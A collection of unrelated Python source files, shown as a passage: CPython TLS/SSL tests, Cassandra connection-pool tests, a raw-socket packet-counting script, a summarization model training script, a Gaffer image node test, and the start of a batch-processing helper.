"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_npn_protocols(server_protocols)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.options |= ssl.OP_NO_TLSv1_3
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.options |= ssl.OP_NO_TLSv1_3
client_context2.options |= ssl.OP_NO_TLSv1_3
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
test_host_connection_pool.py
|
# Copyright 2013-2015 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
import unittest2 as unittest
except ImportError:
import unittest # noqa
from mock import Mock, NonCallableMagicMock
from threading import Thread, Event, Lock
from cassandra.cluster import Session
from cassandra.connection import Connection
from cassandra.pool import Host, HostConnectionPool, NoConnectionsAvailable
from cassandra.policies import HostDistance, SimpleConvictionPolicy
class HostConnectionPoolTests(unittest.TestCase):
def make_session(self):
session = NonCallableMagicMock(spec=Session, keyspace='foobarkeyspace')
session.cluster.get_core_connections_per_host.return_value = 1
session.cluster.get_max_requests_per_connection.return_value = 1
session.cluster.get_max_connections_per_host.return_value = 1
return session
def test_borrow_and_return(self):
host = Mock(spec=Host, address='ip1')
session = self.make_session()
conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100)
session.cluster.connection_factory.return_value = conn
pool = HostConnectionPool(host, HostDistance.LOCAL, session)
session.cluster.connection_factory.assert_called_once_with(host.address)
c, request_id = pool.borrow_connection(timeout=0.01)
self.assertIs(c, conn)
self.assertEqual(1, conn.in_flight)
conn.set_keyspace_blocking.assert_called_once_with('foobarkeyspace')
pool.return_connection(conn)
self.assertEqual(0, conn.in_flight)
self.assertNotIn(conn, pool._trash)
def test_failed_wait_for_connection(self):
host = Mock(spec=Host, address='ip1')
session = self.make_session()
conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100)
session.cluster.connection_factory.return_value = conn
pool = HostConnectionPool(host, HostDistance.LOCAL, session)
session.cluster.connection_factory.assert_called_once_with(host.address)
pool.borrow_connection(timeout=0.01)
self.assertEqual(1, conn.in_flight)
conn.in_flight = conn.max_request_id
# we're already at the max number of requests for this connection,
# so we this should fail
self.assertRaises(NoConnectionsAvailable, pool.borrow_connection, 0)
def test_successful_wait_for_connection(self):
host = Mock(spec=Host, address='ip1')
session = self.make_session()
conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100, lock=Lock())
session.cluster.connection_factory.return_value = conn
pool = HostConnectionPool(host, HostDistance.LOCAL, session)
session.cluster.connection_factory.assert_called_once_with(host.address)
pool.borrow_connection(timeout=0.01)
self.assertEqual(1, conn.in_flight)
def get_second_conn():
c, request_id = pool.borrow_connection(1.0)
self.assertIs(conn, c)
pool.return_connection(c)
t = Thread(target=get_second_conn)
t.start()
pool.return_connection(conn)
t.join()
self.assertEqual(0, conn.in_flight)
def test_all_connections_trashed(self):
host = Mock(spec=Host, address='ip1')
session = self.make_session()
conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100, lock=Lock())
session.cluster.connection_factory.return_value = conn
session.cluster.get_core_connections_per_host.return_value = 1
# manipulate the core connection setting so that we can
# trash the only connection
pool = HostConnectionPool(host, HostDistance.LOCAL, session)
session.cluster.get_core_connections_per_host.return_value = 0
pool._maybe_trash_connection(conn)
session.cluster.get_core_connections_per_host.return_value = 1
submit_called = Event()
def fire_event(*args, **kwargs):
submit_called.set()
session.submit.side_effect = fire_event
def get_conn():
conn.reset_mock()
c, request_id = pool.borrow_connection(1.0)
self.assertIs(conn, c)
self.assertEqual(1, conn.in_flight)
conn.set_keyspace_blocking.assert_called_once_with('foobarkeyspace')
pool.return_connection(c)
t = Thread(target=get_conn)
t.start()
submit_called.wait()
self.assertEqual(1, pool._scheduled_for_creation)
session.submit.assert_called_once_with(pool._create_new_connection)
# now run the create_new_connection call
pool._create_new_connection()
t.join()
self.assertEqual(0, conn.in_flight)
def test_spawn_when_at_max(self):
host = Mock(spec=Host, address='ip1')
session = self.make_session()
conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100)
conn.max_request_id = 100
session.cluster.connection_factory.return_value = conn
# core conns = 1, max conns = 2
session.cluster.get_max_connections_per_host.return_value = 2
pool = HostConnectionPool(host, HostDistance.LOCAL, session)
session.cluster.connection_factory.assert_called_once_with(host.address)
pool.borrow_connection(timeout=0.01)
self.assertEqual(1, conn.in_flight)
# make this conn full
conn.in_flight = conn.max_request_id
# we don't care about making this borrow_connection call succeed for the
# purposes of this test, as long as it results in a new connection
# creation being scheduled
self.assertRaises(NoConnectionsAvailable, pool.borrow_connection, 0)
session.submit.assert_called_once_with(pool._create_new_connection)
def test_return_defunct_connection(self):
host = Mock(spec=Host, address='ip1')
session = self.make_session()
conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100)
session.cluster.connection_factory.return_value = conn
pool = HostConnectionPool(host, HostDistance.LOCAL, session)
session.cluster.connection_factory.assert_called_once_with(host.address)
pool.borrow_connection(timeout=0.01)
conn.is_defunct = True
session.cluster.signal_connection_failure.return_value = False
pool.return_connection(conn)
# the connection should be closed a new creation scheduled
conn.close.assert_called_once()
session.submit.assert_called_once()
self.assertFalse(pool.is_shutdown)
def test_return_defunct_connection_on_down_host(self):
host = Mock(spec=Host, address='ip1')
session = self.make_session()
conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100, signaled_error=False)
session.cluster.connection_factory.return_value = conn
pool = HostConnectionPool(host, HostDistance.LOCAL, session)
session.cluster.connection_factory.assert_called_once_with(host.address)
pool.borrow_connection(timeout=0.01)
conn.is_defunct = True
session.cluster.signal_connection_failure.return_value = True
pool.return_connection(conn)
# the connection should be closed a new creation scheduled
session.cluster.signal_connection_failure.assert_called_once()
conn.close.assert_called_once()
self.assertFalse(session.submit.called)
self.assertTrue(pool.is_shutdown)
def test_return_closed_connection(self):
host = Mock(spec=Host, address='ip1')
session = self.make_session()
conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=True, max_request_id=100)
session.cluster.connection_factory.return_value = conn
pool = HostConnectionPool(host, HostDistance.LOCAL, session)
session.cluster.connection_factory.assert_called_once_with(host.address)
pool.borrow_connection(timeout=0.01)
conn.is_closed = True
session.cluster.signal_connection_failure.return_value = False
pool.return_connection(conn)
# a new creation should be scheduled
session.submit.assert_called_once()
self.assertFalse(pool.is_shutdown)
def test_host_instantiations(self):
"""
Ensure Host fails if not initialized properly
"""
self.assertRaises(ValueError, Host, None, None)
self.assertRaises(ValueError, Host, '127.0.0.1', None)
self.assertRaises(ValueError, Host, None, SimpleConvictionPolicy)
def test_host_equality(self):
"""
Test host equality has correct logic
"""
a = Host('127.0.0.1', SimpleConvictionPolicy)
b = Host('127.0.0.1', SimpleConvictionPolicy)
c = Host('127.0.0.2', SimpleConvictionPolicy)
self.assertEqual(a, b, 'Two Host instances should be equal when sharing.')
self.assertNotEqual(a, c, 'Two Host instances should NOT be equal when using two different addresses.')
self.assertNotEqual(b, c, 'Two Host instances should NOT be equal when using two different addresses.')
|
packet_filter_tcp_udp_icmp.py
|
import socket,sys,threading,time
from struct import *
s1=socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.IPPROTO_TCP)
s2=socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.IPPROTO_UDP)
s3=socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.IPPROTO_ICMP)
count=0
tcp=0
icmp=0
udp=0
def printvalues():
global udp
global tcp
global icmp
print "udp :"+str(udp)+" tcp :"+str(tcp)+" icmp:"+str(icmp)
def tcpcount():
global count
global tcp
while True:
if count>200:
printvalues()
sys.exit()
packet=s1.recvfrom(65565)
print packet
count+=1
tcp+=1
# time.sleep(1)
def udpcount():
global count
global udp
while True:
if count>200:
printvalues()
sys.exit()
packet=s2.recvfrom(65565)
print packet
count+=1
udp+=1
# time.sleep(1)
def icmpcount():
global count
global icmp
while True:
if count>200:
printvalues()
sys.exit()
packet=s3.recvfrom(65565)
print packet
count+=1
icmp+=1
# time.sleep(1)
lock=threading.Lock()
lock.acquire()
threading.Thread(target=tcpcount).start()
threading.Thread(target=udpcount).start()
threading.Thread(target=icmpcount).start()
print "hi"
lock.release()
#while count<200:
# count+=1
# packet=s.recvfrom(65565)
# print packet
# packet=packet[0]
# ip_header=packet[0:20]
# iph = unpack('!BBHHHBBH4s4s' , ip_header)
# protocol=iph[6]
# print protocol
# p=int(protocol)
# if p==1:
# icmp+=1
# elif p==6:
# tcp+=1
# elif p==17:
# udp+=1
#threading.Thread(target=tcpcount).start()
#threading.Thread(target=udpcount).start()
#threading.Thread(target=icmpcount).start()
|
train_extractive.py
|
#!/usr/bin/env python
"""
Main training workflow
"""
from __future__ import division
import argparse
import glob
import os
import random
import signal
import time
import torch
import distributed
from models import data_loader, model_builder
from models.data_loader import load_dataset
from models.model_builder import ExtSummarizer
from models.trainer_ext import build_trainer
from others.logging import logger, init_logger
model_flags = ['hidden_size', 'ff_size', 'heads', 'inter_layers', 'encoder', 'ff_actv', 'use_interval', 'rnn_size']
def train_multi_ext(args):
""" Spawns 1 process per GPU """
init_logger()
nb_gpu = args.world_size
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(nb_gpu):
device_id = i
procs.append(mp.Process(target=run, args=(args,
device_id, error_queue,), daemon=True))
procs[i].start()
logger.info(" Starting process pid: %d " % procs[i].pid)
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(args, device_id, error_queue):
""" run process """
setattr(args, 'gpu_ranks', [int(i) for i in args.gpu_ranks])
try:
gpu_rank = distributed.multi_init(device_id, args.world_size, args.gpu_ranks)
print('gpu_rank %d' % gpu_rank)
if gpu_rank != args.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
train_single_ext(args, device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def validate_ext(args, device_id):
timestep = 0
if (args.test_all):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
xent_lst = []
for i, cp in enumerate(cp_files):
step = int(cp.split('.')[-2].split('_')[-1])
xent = validate(args, device_id, cp, step)
xent_lst.append((xent, cp))
max_step = xent_lst.index(min(xent_lst))
if (i - max_step > 10):
break
xent_lst = sorted(xent_lst, key=lambda x: x[0])[:3]
logger.info('PPL %s' % str(xent_lst))
for xent, cp in xent_lst:
step = int(cp.split('.')[-2].split('_')[-1])
test_ext(args, device_id, cp, step)
else:
while (True):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (not os.path.getsize(cp) > 0):
time.sleep(60)
continue
if (time_of_cp > timestep):
timestep = time_of_cp
step = int(cp.split('.')[-2].split('_')[-1])
validate(args, device_id, cp, step)
test_ext(args, device_id, cp, step)
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (time_of_cp > timestep):
continue
else:
time.sleep(300)
def validate(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = ExtSummarizer(args, device, checkpoint)
model.eval()
valid_iter = data_loader.Dataloader(args, load_dataset(args, 'valid', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=False)
trainer = build_trainer(args, device_id, model, None)
stats = trainer.validate(valid_iter, step)
return stats.xent()
def test_ext(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = ExtSummarizer(args, device, checkpoint)
model.eval()
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.test_batch_size, device,
shuffle=False, is_test=True)
trainer = build_trainer(args, device_id, model, None)
trainer.test(test_iter, step)
def train_ext(args, device_id):
if (args.world_size > 1):
train_multi_ext(args)
else:
train_single_ext(args, device_id)
def train_single_ext(args, device_id):
init_logger(args.log_file)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
logger.info('Device ID %d' % device_id)
logger.info('Device %s' % device)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if device_id >= 0:
torch.cuda.set_device(device_id)
torch.cuda.manual_seed(args.seed)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if args.train_from != '':
logger.info('Loading checkpoint from %s' % args.train_from)
checkpoint = torch.load(args.train_from,
map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
else:
checkpoint = None
def train_iter_fct():
return data_loader.Dataloader(args, load_dataset(args, 'train', shuffle=True), args.batch_size, device,
shuffle=True, is_test=False)
model = ExtSummarizer(args, device, checkpoint)
optim = model_builder.build_optim(args, model, checkpoint)
logger.info(model)
trainer = build_trainer(args, device_id, model, optim)
try:
trainer.train(train_iter_fct, args.train_steps)
finally:
trainer.close_writer()
|
ImageNodeTest.py
|
##########################################################################
#
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import unittest
import threading
import imath
import IECore
import Gaffer
import GafferTest
import GafferImage
import GafferImageTest
class ImageNodeTest( GafferImageTest.ImageTestCase ) :
def testCacheThreadSafety( self ) :
c = GafferImage.Constant()
c["format"].setValue( GafferImage.Format( 200, 200, 1.0 ) )
g = GafferImage.Grade()
g["in"].setInput( c["out"] )
g["multiply"].setValue( imath.Color3f( 0.4, 0.5, 0.6 ) )
gradedImage = g["out"].image()
# not enough for both images - will cause cache thrashing
Gaffer.ValuePlug.setCacheMemoryLimit( 2 * g["out"].channelData( "R", imath.V2i( 0 ) ).memoryUsage() )
images = []
exceptions = []
def grader() :
try :
images.append( g["out"].image() )
except Exception, e :
exceptions.append( e )
def processer() :
try :
GafferImageTest.processTiles( g["out"] )
except Exception, e :
exceptions.append( e )
graderThreads = []
for i in range( 0, 10 ) :
thread = threading.Thread( target = grader )
graderThreads.append( thread )
thread.start()
for thread in graderThreads :
thread.join()
for image in images :
self.assertEqual( image, gradedImage )
processerThreads = []
for i in range( 0, 10 ) :
thread = threading.Thread( target = processer )
processerThreads.append( thread )
thread.start()
for thread in processerThreads :
thread.join()
for e in exceptions :
raise e
def testNodesConstructWithDefaultValues( self ) :
self.assertNodesConstructWithDefaultValues( GafferImage )
self.assertNodesConstructWithDefaultValues( GafferImageTest )
def setUp( self ) :
GafferTest.TestCase.setUp( self )
self.__previousCacheMemoryLimit = Gaffer.ValuePlug.getCacheMemoryLimit()
def tearDown( self ) :
GafferTest.TestCase.tearDown( self )
Gaffer.ValuePlug.setCacheMemoryLimit( self.__previousCacheMemoryLimit )
if __name__ == "__main__":
unittest.main()
|
batch_process.py
|
from typing import List, Dict, Union, Callable
from math import ceil
from threading import Thread
from multiprocessing import Manager
from joblib import Parallel, delayed
from .progress_bar import progress_bar
from .task_wrapper import task_wrapper
def batch_process(
items: list,
function: Callable,
n_workers: int=8,
sep_progress: bool=False,
*args,
**kwargs,
) -> List[Dict[str, Union[str, List[str]]]]:
"""
Batch process a list of items
The <items> will be divided into n_workers batches which process
the list individually using joblib. When done, all results are
collected and returned as a list.
Parameters:
-----------
items : list
List of items to batch process. This list will be divided in
n_workers batches and processed by the function.
function : Callable
Function used to process each row. Format needs to be:
callable(item, *args, **kwargs).
n_workers : int (Default: 8)
Number of processes to start (processes). Generally there is
an optimum between 1 <= n_workeres <= total_cpus as there is
an overhead for creating separate processes.
sep_progress : bool (Default: False)
Show a separate progress bar for each worker.
*args, **kwargs : -
(named) arguments to pass to batch process function.
Returns:
--------
input_items : List [ Dict [ str, Union [ str, List [ str ]]]]
List of processed input_items with collected id, words,
tokens, and labels.
"""
# Divide data in batches
batch_size = ceil(len(items) / n_workers)
batches = [
items[ix:ix+batch_size]
for ix in range(0, len(items), batch_size)
]
# Check single or multiple progress bars
if sep_progress:
totals = [len(batch) for batch in batches]
else:
totals = len(items)
# Start progress bar in separate thread
manager = Manager()
queue = manager.Queue()
try:
